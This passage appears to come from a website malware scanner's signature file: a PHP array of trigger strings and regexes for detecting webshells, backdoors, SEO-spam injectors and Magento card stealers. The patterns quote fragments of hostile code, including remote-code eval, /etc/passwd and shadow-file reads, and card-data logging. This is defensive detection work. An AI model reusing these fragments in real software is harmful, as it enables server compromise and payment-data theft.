	'\';eval\((\$\w+\.){10,}(\$\w+)\);return \$\w+;\}' => array(REX_CLEAR_MULTIMATCH, 'rex.malware.eval_concat.001', 'if..function_exists..(\w+).\)\)\{function \1\(\$\w+\)\s*\{[^\}]+?\';eval\((?:\$\w+\.){10,}\$\w+\);return \$\w+;\}[^;]+;eval\(\1\([^\)]+\)\);\}'),
	'this\s*\[\s*["\']eval["\']\s*\]\s*\(\s*this\s*\[\s*["\']unescape["\']\s*\]\s*\(\s*["\'](?:i|%69)(?:f|%66)(?:\(|%28)(?:\(|%28)(?:n|%6e|%6E)(?:e|%65)(?:w|%77)(?: |%20)(?:R|%52)(?:e|%65)(?:g|%67)(?:E|%45)(?:x|%78)(?:p|%70)' => array(REX_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.039', 'this\s*\[\s*["\']eval["\']\s*\]\s*\(\s*this\s*\[\s*["\']unescape["\']\s*\]\s*\(\s*["\'](?:i|%69)(?:f|%66)(?:\(|%28)(?:\(|%28)(?:n|%6e|%6E)(?:e|%65)(?:w|%77)(?: |%20)(?:R|%52)(?:e|%65)(?:g|%67)(?:E|%45)(?:x|%78)(?:p|%70)(?:\(|%28)(?:"|%28|\'|%27)(?:(?:o|%6f|%6F)(?:n|%6e|%6E)(?:e|%65)(?:p|%70)(?:a|%61)(?:g|%67)(?:e|%65)|(?:c|%63)(?:h|%68)(?:e|%65)(?:c|%63)(?:k|%6b|%6B)(?:o|%6f|%6F)(?:u|%75)(?:t|%74)|(?:o|%6f|%6F)(?:n|%6e|%6E)(?:e|%65)(?:s|%73)(?:t|%74)(?:e|%65)(?:p|%70)|(?:f|%66)(?:i|%69)(?:r|%72)(?:e|%65)(?:c|%63)(?:h|%68)(?:e|%65)(?:c|%63)(?:k|%6b|%6B)(?:o|%6f|%6F)(?:u|%75)(?:t|%74))(?:\||%7C|%7c})(?:[^)]+?\)){1,5}\s*\)\s*;?'),
	';eval\(\$[\w]+\(\$[\w]+\(\$[\w]+\(\$[\w]+\([^;]{1000}' => array(REX_CLEAR_LINEMATCH, 'php.spam-seo.injector.248', '\$[\w]+=...;\$[\w]+=...;\$[\w]+=...;\$[\w]+=...;[^\(]+\$[\w]+;eval\(\$[\w]+\(\$[\w]+[^\)]+\)+;'),
	'%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.injector.011','eval.unescape[^%]+%66%75%6e%63%74%69%6f%6e%20[^>]+;[\s]*eval.unescape.[^>]+\)\);'),
	'$code="";foreach ($data as $var){ $code.=chr($var);} eval($code);' => array(STR_CLEAR_LINEMATCH, 'php.redirect.header_location.012', '\\$data=array.[\\d,\\s]+.;.code="";foreach[^;]+;}[\\s]*eval..code.;[\\s]*unset..data.;[\\s]*unset..code.;'),
	'n||k["\\\b\\\c\\\d\\\a\\\f\\\m\\\e"]' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.iframe-doorway.003', 'eval\(function\(p,.+?;return p;\}\(\'[^{]+?n\|\|k\["\\\.b\\\.c\\\.d\\\.a\\\.f\\\.m\\\.e.+?\'\.split\(\'\|\'\),0,\{\}\)\)'),
	'w=this[\'unescape\'](y);this[\'eval\'](w);' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.redirect.020', 'var x="[^"]+",y="",w=""[^}]+}[\s]*w=this..unescape[^[]+this\[.eval.\]\(w\);'),
	'eval(base64_decode(\'ZXJyb3JfcmVwb3J0aW5nKDApOwokYm90X2xp' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.190', 'eval\(base64_decode\(.ZXJyb3JfcmVwb3J0aW5nKDApO[^;]+.\)\);'),
	'))})(String.fromCharCode,eval)</script>' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.redirect.024', '<script>\(function\([^}]+}\)\(String\.fromCharCode,eval\)<\/script>'),
	'eval\(.echo base64_encode\(.[^;]+.\);.\);' => array(REX_CLEAR_MULTIMATCH, 'rex.malware.plchldr.001', 'eval\(.echo base64_encode\(.[^;]+.\);.\);'),
	'RETURNTRANSFER, 1);$result = curl_exec($ch);eval(\'?>\'.$result);' => array(STR_CLEARFILE, 'php.backdoor.eval_GET.004', NULL),
),

'file' => array(STR_TRIGGER,

	'file_' => array(STR_TRIGGER,
	
		'file_get_contents' => array(STR_TRIGGER,
	
			'fopen' => array(STR_TRIGGER,
	
				'fwrite' => array(STR_TRIGGER,
	
					'error_reporting(0);' => array(STR_TRIGGER,
	
						'||stristr($O' => array(STR_TRIGGER,

							'curl_exec($' => array(STR_TRIGGER,
								'json_decode($' => array(STR_TRIGGER,
									'header($' => array(STR_TRIGGER,
										';exit();}if(stristr($' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.infector.012', '(error_reporting\([\d]+\);)?\$[\w]+[\s]*=[\s]*[\w]+;[\s]*\$[\w]+[\s]*=[^;]+;\$[\w]+[\s]*=[\s]*str_replace\([^&]+\(\(isset\(\$_SERVER\[\$[\w]+\{[\d]+\}[^!]+&&\$[\w]+![\s]*=\$[\w]+\{[\d]+\}[^@]+@file_get_contents\(\$[\w]+\);\}catch[\s]*\(Exception[\s]*\$[\w]+\)\{\}\}return[\s]*\$[\w]+;[\s]*\}[\s]*function[\s]*[\w]+\(\$[^;]+;fwrite\(\$[\w]+,[\s]*\$[\w]+\);fclose\(\$[\w]+\);\}'),
									),
								),
							),

							') or die("0");fwrite($' => array(STR_CLEARFILE, 'php.spam-seo.infector.010', NULL),
							'});echo $file_get_contents;exit();}if(stristr($' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.infector.011', 'error_reporting\([\d]+\);[\s]*\$[\w]+=[^&]+&&[\s]*\$_SERVER\[\$[^&]+&&[\s]+\$_SERVER\[\$[^&]+\}\)&&\$[\w]+!=\$[^@]+@file_get_contents\(\$[\w]+\);\}catch[\s]*\(Exception[\s]*\$[\w]+\)\{\}\}return[\s]*\$[\w]+;[\s]*\}function[\s]*[\w]+\([^;]+;[\s]*fwrite\(\$[\w]+,[\s]*\$[\w]+\);[\s]*fclose\(\$[\w]+\);[\s]*\}'),
						),

						'function wp_hts($str){' => array(STR_CHAIN_TRIGGER,
							'$codes = explode(\'{[DEL]}\', $code);' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.injector.121', 'function getSource\(\$url,[^\)]+\)[\s]*\{[\s]*\$ua[\s]*=[\s]*wp_hts[^;]+;[\s]*\$host[\s]*=[\s]*wp_hts\([^;]+\);[\s]*\$code[^}]+\}[^\*]+\*[^}]+return hex2bin[^\*]+H\*[^{]+\{[\s]*\$code[^\*]+\*[^}]+\}[^@]+md5\(@getcwd[^>]+-->[^\*]+return getFilterTag\(\$code\);[\s]*\}'),
							'echo getFilterCache();' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.injector.121.02', 'if\([\s]*\![\s]*is_admin\(\)[\s]*\)[\s]*\{[\s]*echo getFilterCache\(\);[\s]*\}'),
						),
	
						'fopen("$htaccess", "w");' => array(STR_TRIGGER,
							'.\'/wp-login.php\';' => array(STR_TRIGGER,
								'= "/footer.php";}' => array(STR_TRIGGER,
									'preg_replace(\'/<!--\'.$' => array(STR_CLEARFILE, 'php.backdoor.uploader.311', NULL),
								),
							),
						),
	
						'";error_reporting(0);$' => array(STR_TRIGGER,
							']}=@mail(${$' => array(STR_TRIGGER,
								']},"w");}else{};}if(isset($_POST["' => array(STR_CLEARFILE, 'php.backdoor.eval_REQUEST.062', NULL),
							),
						),
	
						'echo "Upload File:' => array(STR_TRIGGER,
							'echo "MySQL: $mysql | Perl: $perl | Python: $python' => array(STR_CLEARFILE, 'php.backdoor.webshell.135', NULL),
						),
	
						'@symlink(\'/home/' => array(STR_TRIGGER,
							'eval(base64_decode($' => array(STR_CLEARFILE, 'php.hacktool.symlink_bypass.003', NULL),
						),
	
						'$getCache = base64_decode("aHR0c' => array(STR_TRIGGER,
							'$getindex = file_get_contents($getCache);' => array(STR_CLEARFILE, 'php.backdoor.uploader.325', NULL),
						),
	
						'500 Internal Server Error\', true, 500); } ob_end_flush(); session_write_close(); exit();' => array(STR_TRIGGER,
							'error_reporting(E_ALL); } else { error_reporting(0); ini_set(\'expose_php\', 0); } ob_start(); class' => array(STR_CLEARFILE, 'php.hacktool.spamtool.008', NULL),
						),
	
						'if (function_exists(\'fsockopen\')) {' => array(STR_TRIGGER,
							'base64_decode(base64_decode("YUhSMGNEb3ZMM' => array(STR_CLEARFILE, 'php.backdoor.file_get_contents.041', NULL),
						),
	
						'@posix_getpwuid(@fileowner($folder));' => array(STR_TRIGGER,
							'gcc -o bcc bcc.c' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.42', NULL),
						),
	
						'"]}=fopen(getcwd()."' => array(STR_TRIGGER,
							':{call_user_func_array("' => array(STR_CLEARFILE, 'php.backdoor.assert.034', '\$[\w]+[\s]*=[\s]*[^;]+chr\([\d]+\)[\s]*\.[\s]*chr[^;]+;[\s]*\$[\w]+[\s]*=[\s]*\$[\w]+\(\$[\w]+\(chr\([^;]+;[^@]+@file_put_contents[^;]+\);[\s]*@include[^;]+\);[\s]*@unlink[^;]+\);'),
						),
	
						'@extension_loaded(' => array(STR_TRIGGER,
							'YWx5dGljcy5hcGllcy5vcmc' => array(STR_CLEARFILE, 'php.backdoor.curl.030', NULL),
						),
	
						'echo "error' => array(STR_CLEARFILE, 'php.backdoor.file_get_contents.024', NULL),
						'echo "gabisa' => array(STR_CLEARFILE, 'php.backdoor.shell_get.004', NULL),
						'<textarea id=\'evalcode\'' => array(STR_CLEARFILE, 'php.backdoor.webshell.133', NULL),
						'[\'post_content\'] =' => array(STR_CLEARFILE, 'php.spam-seo.link_injector.010', NULL),
						'=array($_POST[md5(ThePageURL()' => array(STR_CLEARFILE, 'php.spam-seo.injector.259', NULL),
						'$shelltext=("uname -a");' => array(STR_CLEARFILE, 'php.backdoor.webshell.139', NULL),
						'= str_replace(\'www.\', \'\', @$_SERVER[\'HTTP_HOST\'])' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.273', 'error_reporting\(\d+\)\s*;\s*(\$\w+)\s*=\s*[\'"]https?:\/\/[^;]+;\s*\$\w+\s*=\s*str_replace\([\'"]www\.[\'"]\s*,\s*[\'"]{2}\s*,\s*\@?\$_SERVER\[.HTTP_HOST.\]\)\s*;\s*(\$\w+)\s*=\s*\1\.[^;]+;\s*if\s*\(\s*function_exists\(.curl_init.\)[^}]+}\s*}\s*elseif\s*\(\s*function_exists\(.file_get_contents.\)\s*\)\s*{\s*\@?(\$\w+)\s*=\s*file_get_contents\(\2\)\s*;\s*}\s*echo\s*\3\s*;\s*if\s*\(\s*isset\(\$_GET\[[^{]+{\s*\$\w+\s*=\s*fopen\(\$_GET\[[^;]+;\s*fwrite\(\$\w+\s*,\s*file_get_contents\s*\(\s*\1\.[^;]+;\s*fclose\(\$\w+\)\s*;\s*}\s*echo\s*[\'"]<\!DOCTYPE[^>]+>\s*[\'"]\s*;'),
						'$img_htacces = "AddHandler application/x-httpd-php' => array(STR_CLEARFILE, 'php.backdoor.injector.127', NULL),
						'SPECIMENT MINI SHELL' => array(STR_CLEARFILE, 'php.backdoor.webshell.162', NULL),
						'substr(sprintf(\'%o\', fileperms($_POST[\'path\'])), -4)' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.021', NULL),
						'fputs($brute_save, date("d.m.y H:i:s")."|HOST:' => array(STR_CLEARFILE, 'php.backdoor.webshell.182', NULL),
						'fwrite($fp, implode(\';\', $dbLine).";$row[0]\n");' => array(STR_CLEARFILE, 'php.hacktool.wordpress_bruteforce.007', NULL),
						']}[0])?true:false):header(\'Content-Type: image/jpeg\');break;case(preg_match("/\.pdf/i",${${"' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.372', '\$\{"[^\}]+\}\[[^\]]+\][\s]*=[\s]*"[^;]+";[\s]*\$\{[^\n]+exit;[\s\}]+'),
						'htmlspecialchars(file_get_contents($_GET[file]))' => array(STR_CLEARFILE, 'php.backdoor.filesman.140', NULL),
						'fwrite($fp,file_get_contents(base64_decode(rawurldecode' => array(STR_CLEARFILE, 'php.backdoor.wp-uploader.001', NULL),
						'$ph = bin2hex( mhash( MHASH_SHA256, $_GET[' => array(STR_CLEARFILE, 'php.hacktool.downloader.003', NULL),
					), 
	
					'file_get_contents\(.http' => array(REX_TRIGGER,
	
						'"wb");' => array(STR_TRIGGER,
							'\$fp[\s]*=[\s]*fopen\([^\)]+php.,[\s]*.wb.\);[\s]*fwrite\(.fp,[\s]*file_get_contents\(.http' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.uploader.379', '\$fp[\s]*=[\s]*fopen\([^\)]+php.,[\s]*.wb.\);[\s]*fwrite\(.fp,[\s]*file_get_contents\(.http[^;]+\);[\s]*fclose\([^;]+\);'),
						),
	
						'pastebin' => array(STR_TRIGGER,
							'w\') or die(' => array(STR_CLEARFILE, 'php.backdoor.file_get_contents.054', NULL),
						),
	
						'$stringData = $_SERVER["SERVER_NAME"] . "|" . $credentials["username"] . ":" . $credentials["password"] . "|" . $ip . "\n";' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.joomla_steal.001.02', '\/\/ Start Login Protection[^\}]+\}[^\/]+(.\{.ip\}[^;]+;[\s]*preg_match_all[^;]+\);[^\/]+)?\/\/[\s]*(?i)END LOGIN PROTECTION'),
						'chmod("jeentel" , 0755);' => array(STR_CLEARFILE, 'php.backdoor.uploader.420', NULL),
					),
	
					'extract' => array(STR_TRIGGER,

						'$matcholddomain' => array(STR_TRIGGER,
							'@file_get_contents\("http:\/\/(.*)\/code' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.221', 'if[\s]*\(!*isset\(\$_REQUEST\[.action.\]\) && isset\(\$_REQUEST\[.password[^{]+\{[\s]*(switch[\s]*\(\$_REQUEST\[.action.\]\)|\$div_code_name)[^@]+@file_get_contents[^\?]+(php\?i)?[^<]+"<\?php[^\*]+extract\([\w]+_[\w]+_[\w]+\(\$[\w]+\)\);[\s\}]+'),
						),

						'extract(x($i));' => array(STR_TRIGGER,
							'tempnam("/tmp", "0");' => array(STR_CLEARFILE, 'php.backdoor.webshell.241', NULL),
						),

						'function theme_temp_setup' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.221.02', 'if[^\w]+function_exists[^\w]+theme_temp_setup[^{]+\{[\s]*\$path[\s]*=[\s]*\$_SERVER[^{]+false\)[\s]*\{[\s]*function[\s]*file_get_contents_[^>]+extract\(theme_temp_setup[^;]+;[\s}]+'),
					),

					'$xxx = fwrite($xx' => array(STR_CHAIN_TRIGGER,
						'$xxx = fwrite($xx' => array(STR_CHAIN_TRIGGER,
							'file_get_contents("http' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector_gen.042', 'if\(isset\(\$_GET\[.[\w]+.\]\)+[\s]*\{[\s]*\$dir[\s]*=[\s]*\$_SERVER\[.DOCUMENT[^;]+\];[\s]*\$x[\s]*=[\s]*file_get_contents[^;]+;[\s]*\$xx[^\}]+\}[\s]*fclose[^;]+\);[\s]*break;[\s]*\}'),
							'error_reporting(0);' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector_gen.042.02', 'error_reporting\(0\);'),
						),
					),
	
					'create_file' => array(STR_TRIGGER,
						'create_file("config.inc",$' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.091.04', NULL),
						'echo(\'<a href="\'.$_SERVER[\'REQUEST_URI\'].\'?file=\'.$' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.091.05', NULL),
					),
	
					'echo system(\'gcc' => array(STR_TRIGGER,
						'proc_open($' => array(STR_TRIGGER,
							'file_get_contents(\'/etc/passwd' => array(STR_CLEARFILE, 'php.malware.dropper.041', NULL),
						),
					),
	
					'if($_GET[\'h\']<>\'\'){' => array(STR_TRIGGER,
						'echo "<img src=\'temp.gif\' / ><hr>";' => array(STR_CLEARFILE, 'php.hacktool.simpleimageupload_exploit.002', NULL),
					),
	
					'AND (str_word_count($keywords)<' => array(STR_TRIGGER,
						'curl_setopt($ch, CURLOPT_URL, "http' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.115', NULL),
					),
	
					'.php\', \'w\') ) {' => array(STR_TRIGGER,
						'echo \'2\';' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.file_get_contents.011', 'if\( \$[\w]+[\s]*=[\s]*fopen\( .[\w]+\.[\w]+., .w.\)[\s]*\)[\s]*{[\s]*if\([\s]*fwrite\([\s]*\$[\w]+,[\s]*file_get_contents\( .http:..[^{]+{[\s]*fclose\( \$[\w]+ \);[\s]*echo .0.;[\s]*}[\s]*else[\s]*{[\s]*echo .1.;[\s]*}[\s]*}[\s]*else[\s]*{[\s]*echo[\s]*.2.;[\s]*}'),
					),
	
					'if(file_exists($filename) && is_writable($filename)) {' => array(STR_TRIGGER,
						'\$file\s*=\s*str_replace\(\$\w+\[\d\],\s*\$pattern_php,\s*\$file\)' => array(REX_CLEARFILE, 'php.malware.injector.045', NULL),
					),
	
					'file_get_contents($cgi);' => array(STR_TRIGGER,
						'file_get_contents($htaccess);' => array(STR_CLEARFILE, 'php.backdoor.uploader.241', NULL),
					),
	
					'explode("wp-content/' => array(STR_TRIGGER,
						'my_file_put_contents($file,' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.injector.129', 'if[\s]*\(\$_POST\[[^)]+\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*explode\(.wp-content[^<]+\$[\w]+[\s]*=[\s]*.<\?php[^>]+\?>.;[^}]+\}[\s]*die\([^)]+\);[\s]*\}'),
					),
	
					'echo $_GET[\'checkword\'];' => array(STR_TRIGGER,
						'$record = file_get_contents_curl( $sourceurl );' => array(STR_CLEARFILE, 'php.backdoor.uploader.281', NULL),
					),
	
					'eraseFileForGood(' => array(STR_TRIGGER,
						'filemtime("$currentDir/$dir/");' => array(STR_CLEARFILE, 'php.backdoor.uploader.288', NULL),
					),
	
					'echo date(\'H:i:s \').\'done\';' => array(STR_TRIGGER,
						'findFilesFromDirectory($dir, $files, $find);' => array(STR_CLEARFILE, 'php.backdoor.pastebin_uploader.013', NULL),
					),
	
					'window.location.assign' => array(STR_TRIGGER,
						'if(preg_match(\'/bot|yahoo|google' => array(STR_CLEARFILE, 'php.phishing.redirect.040', NULL),
					),
	
					'$_GET["rdir"];' => array(STR_TRIGGER,
						'@chmod($value,0744);' => array(STR_CLEARFILE, 'php.backdoor.uploader.353', NULL),
					),
	
					'trim(@file_get_contents(\'/proc/' => array(STR_TRIGGER,
						'shell_exec("ps a")));' => array(STR_CLEARFILE, 'php.backdoor.shell-exec.009', NULL),
					),
	
					'fwrite(fopen(' => array(STR_TRIGGER,
						'w+),file_get_contents(http' => array(STR_CLEARFILE, 'php.backdoor.file_get_contents.049', NULL),
					),
	
					'shell_exec($cmd));' => array(STR_TRIGGER,
						'exec($cmd, $stdout);' => array(STR_CLEARFILE, 'php.backdoor.shell-exec.010', NULL),
					),
	
					'$name = trim($_POST[\'newname\']).\'.php\';' => array(STR_TRIGGER,
						'touch(__FILE__, filemtime("index.php"));' => array(STR_CLEARFILE, 'php.backdoor.uploader.392', NULL),
					),
	
					'base64_decode(str_rot13(strrev(' => array(STR_TRIGGER,
						'u1FMfq2oiqJYhI2YibQp0EUn' => array(STR_CLEARFILE, 'php.backdoor.fake_plugin.018', NULL),
					),
	
					'AND (str_word_count($keywords)<' => array(STR_TRIGGER,
						'curl_setopt($ch, CURLOPT_URL, "http' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.115', NULL),
					),
	
					'eval("?>".base64_decode(stream_get_contents(${${' => array(STR_TRIGGER,
						'});return get_defined_vars();}${' => array(STR_CLEARFILE, 'php.malware.obfuscated.058', NULL),
					),

					'?indoxploit";</script>' => array(STR_CLEARFILE, 'php.backdoor.indoexploit.003', NULL),
					'die("ERROR: 7 UNKNOWN' => array(STR_CLEARFILE, 'php.backdoor.uploader.216', NULL),
					'if( isset($_GET[\'ok\']) ) { echo \'<!-- Silence is golden. -->\';}' => array(STR_CLEARFILE, 'php.hacktool.wp_users.006', NULL),
					'>Eval(PHP):&nbsp;<input type="text" name="eval"><input type="submit" value="Execute"></form><form method="get"' => array(STR_CLEARFILE, 'php.backdoor.uploader.143', NULL),
					'echo \'<bad_update>\\\'cant open index file for writing' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.059', NULL),
					'file_get_contents(dirname(__FILE__) ."/". $savefile);' => array(STR_CLEARFILE, 'php.hacktool.generic.006', NULL),
					'$uploadContents = preg_replace("($md5 != \"(.*?)\")","$md5 != \"".$newMD5."\"",file_get_contents("upload.php"));' => array(STR_CLEARFILE, 'php.backdoor.uploader.116', NULL),
					'$xi = xp(xg(xu()));' => array(STR_CLEARFILE, 'php.malware.injector.046', NULL),
					'PAYPalid Mail CHECKER' => array(STR_CLEARFILE, 'php.hacktool.paypal_email_validator.006', NULL),
					'Coded By : MrJoker' => array(STR_CLEARFILE, 'php.hacktool.downloader.005', NULL),
					'CreateFile("content.php",$FileCon);' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.073', NULL),
					'str_ireplace("window|href|location)","",$codes)' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.075', NULL),
					'header("Location: $urlz[0].$' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.header_location.028', 'error_reporting\(0\)\s*;\s*\$\w+\s*=\s*file_get_contents\([^\)]+\)\s*;\s*\$\w+\s*=\s*fopen\([^,]+,\s*[\'"]w[\'"]\s*\)\s*;\s*fwrite\(\$\w+\s*,\s*\$\w+\)\s*;\s*fclose\(\$\w+\)\s*;\s*\$\w+\s*=\s*[^;]+;\s*\$\w+\s*=\s*file\(\$\w+\)\s*;\s*\$\w+\s*=\s*\$\w+\s*\[mt_rand\(\d+,\s*count\(\$\w+\)[^;]+;\s*\$\w+\s*=\s*explode\([\'"]\w+\.php[\'"],\s*\$\w+\)\s*;\s*(?:\$\w+\s*=\s*base64_encode\(\$_GET\[.\w+.\]\)\s*;\s*)+\$\w+\s*=[^;]+;\s*\$_SESSION\[[^\]]+]\s*=[^;]+;\s*header\([\'"]Location:\s*\$\w+\[\d+\]\.\$\w+.\)\s*;'),
					']}=array("wp-config.php","wordpress/wp-config.php","configuration.php","blog/wp-config.php","joomla/configuration.php",' => array(STR_CLEARFILE, 'php.backdoor.pro_shell.001', NULL),
					'if (window!=top) {top.location.href = url;} else { document.location= url;} } window.setTimeout(' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.079', NULL),
					'echo `curl -k $(echo {$GLOBALS[\'URL\']}' => array(STR_CLEARFILE, 'php.malware.dropper.027', NULL),
					'preg_match( "~(" . implode( "|", explode( "|", @$getindex->index' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.260', 'function ([\w]+)\(\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*.http[^;]+;[\s]*\$getCache[\s]*[^;]+;[\s]*if[\s]*\([\s]*function_exists[\s]*\([\s]*.curl_init[^}]+json_decode\(base64_decode\(file_get_contents[^@]+@\$getindex->index[^}]+}[\s]*if\(isset\(\$_GET[^}]+[\s}]+add_action\([^,]+,[\s]*.\1[^;]+;'),
					'echo(\'<pre>\'.htmlspecialchars(file_get_contents($_GET[\'filesrc\'])).\'</pre>\');' => array(STR_CLEARFILE, 'php.backdoor.webshell.163', NULL),
					'echo"im okey";exit;elseif(isset($_GET[' => array(STR_CLEARFILE, 'php.malware.injector.062', NULL),
					'window.onload = function(){display(document.getElementById(\'regex\')); setReplace(document.getElementById(\'replace\'))};' => array(STR_CLEARFILE, 'php.hacktool.generic.020', NULL),
					'<\?php[\s]*\$[\w]+[\s]*=[\s]*file_get_contents\([^;]+\);[\s]*fwrite\(fopen\([^\)]+\),[^\;]+\.[\s]*\$[\w]+\);' => array(REX_CLEARFILE, 'php.backdoor.uploader.361', NULL),
					'(\$\w+)\s*=\s*fopen\s*\(.\w+\.php.\s*,\s*.w\+.\s*\)\s*;\s*\$\w+\s*=\s*file_get_contents\([^\)]+\)\s*;\s*\$\w+\s*=\s*fwrite\s*\(\1\s*,\s*\$\w+\)\s*;(?:\s*fclose\(\$\w+\)\s*;)?' => array(REX_CLEAR_MULTIMATCH, 'php.malware.dropper.019', '(\$\w+)\s*=\s*fopen\s*\(.\w+\.php.\s*,\s*.w\+.\s*\)\s*;\s*\$\w+\s*=\s*file_get_contents\([^\)]+\)\s*;\s*\$\w+\s*=\s*fwrite\s*\(\1\s*,\s*\$\w+\)\s*;(?:\s*fclose\(\$\w+\)\s*;)?'),
					'fopen(\'/home/\'.$user.\'/etc/\'.$' => array(STR_CLEARFILE, 'php.hacktool.cpanel_user_shadow_editor.001', NULL),
					'$file="$path/$b/shadow"' => array(STR_CLEARFILE, 'php.hacktool.cpanel_user_shadow_editor.002', NULL),
					'preg_match_all(\'~<link>(.*?)</link>~\', $page, $' => array(STR_CLEARFILE, 'php.spam-seo.link_injector.013', NULL),
					'$homepage=str_replace_once("<title>' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.101', NULL),
					'c2FmZV9tb2RlID0gT0ZG' => array(STR_CLEARFILE, 'php.hacktool.symlink_bypass.006', NULL),
					'if ( $this->strpos( $this->encrypt( $this->address() ), $this->' => array(STR_CLEARFILE, 'php.backdoor.webshell.228', 'NULL'),
					'fwrite($handler, $ip."|payment[cc_owner]|".$_POST[\'payment\'][\'cc_owner\']."|".time()."\n");' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.125', '\$ip[\s]*=[\s]*\$_SERVER\[.REMOTE_ADDR.\];[\s]*if\(isset\(\$_POST\[.[\w]+.\]\)\)[\s]*\{[\s]*\$handler[\s]*=[\s]*fopen[^;]+\);[\s]*fwrite[^\}]+\}[\s]*if\(isset\(\$_POST[^\}]+\}[\s]*if\(isset\(\$_GET[^\}]+\}[\s]*if\(isset\(\$_GET[^\}]+exit[^;]*;[\s]*\}'),
					'<title>WHMSeller</title>' => array(STR_CLEARFILE, 'php.hacktool.whm-hack.003', NULL),
					'die("[!] Seems like ive bee there before' => array(STR_CLEARFILE, 'php.malware.injector.014', NULL),
					'function _doEvil($' => array(STR_CLEARFILE, 'php.backdoor.file_get_contents.056', NULL),
					'<title>Mail Test</title>' => array(STR_CLEARFILE, 'php.hacktool.mail_tester.008', NULL),
                    'txt\'>MAILLIST by SELLER82</a>' => array(STR_CLEARFILE, 'php.hacktool.mail_tester.009', NULL),               
                    'echo "<originalfilenotfound>";' => array(STR_CLEARFILE, 'php.backdoor.injector.139', NULL),
				),
	
				'if (!isset($_COOKIE[' => array(STR_TRIGGER,
					'header(\'Location: \' . $' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.header_location.032', '\$[\w]+[\s]*=[\s]*@gmdate\([^;]+\);[\s]*\$[\w]+[\s]*=[\s]*intval\(gmdate\(.i[^;]+\);[\s]*if[\s]*\(!empty\(\$_SERVER\[.HTTP_USER_AGENT[^@]+if[\s]*\(\$sock[\s]*=[\s]*@fsockopen[^@]+@function_exists[^\}]+url\);[\s\}]+(\/\/[\s]*[\w]+[\s]*)?'),
					'json_encode(array_combine($_POST[$lng_tpl' => array(STR_CLEARFILE, 'php.malware.filesman.036', NULL),
				),
	
				'file_get_contents(\'php://input' => array(STR_TRIGGER,
					'@fputs($f, $tmp . @gzdeflate(time' => array(STR_CLEARFILE, 'php.malware.cc_stealer.015', '\$[\w]+[\s]*=[\s]*\@dirname\(__FILE__\)[^\}]+@file_exists\(\$[\w]+[\s]*\.[\s]*.wp-load.php.\)\)[\s]*\{[\s]*break;[\s]*\}[\s]*else[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*\$[\w]+[^\{]+\]\)\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*\$_SERVER\[.HTTP_HOST.\];[\s]*\}[\s]*else[\s]*\{[^\{]+\{[\s]*\$[\w]+[\s]*=[\s]*\@file_get_contents\(.php:..input.\);[^\}]+@fclose\(\$[\w]+\);[\s]*\}[\s]*\}'),
					'str_replace(basename($_SERVER[\'SCRIPT_URI\']),"", $result[\'PostURL\']);' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.113', NULL),
				),
	
				'fnd(getcwd());if(' => array(STR_TRIGGER,
					';}include(' => array(STR_CLEARFILE, 'php.malware.dropper.007', NULL),
				),
	
				'@preg_replace(\$_SERVER[\'HTTP_X_{{PASSWORD}}\'], \$_SERVER[\'HTTP_X_CURRENT\']' => array(STR_TRIGGER,
					'XYZ_Browser' => array(STR_CLEARFILE, 'php.malware.xyz_browser.001', NULL),
				),
	
				',"<CODE>",0);if($' => array(STR_TRIGGER,
					'if(!empty($_GET["del"])) @unlink($' => array(STR_CLEARFILE, 'php.malware.injector.061', NULL),
				),
	
				'&checkdomain&host=' => array(STR_TRIGGER,
					'needtoloadsomefiles' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.306', 'if\(![\w]+\([^\)]+\)\)\{\$[\w]+=[^;]+;\$serverid=[^;]+;[\s]*\$server_addr[^\n]+\$incode=[\d]+;\}'),
				),
	
				'input=file_get_contents(' => array(STR_TRIGGER,
					';@flock($fp,LOCK_UN);@fclose($fp);}}elseif(preg_match' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.052', NULL),
				),
	
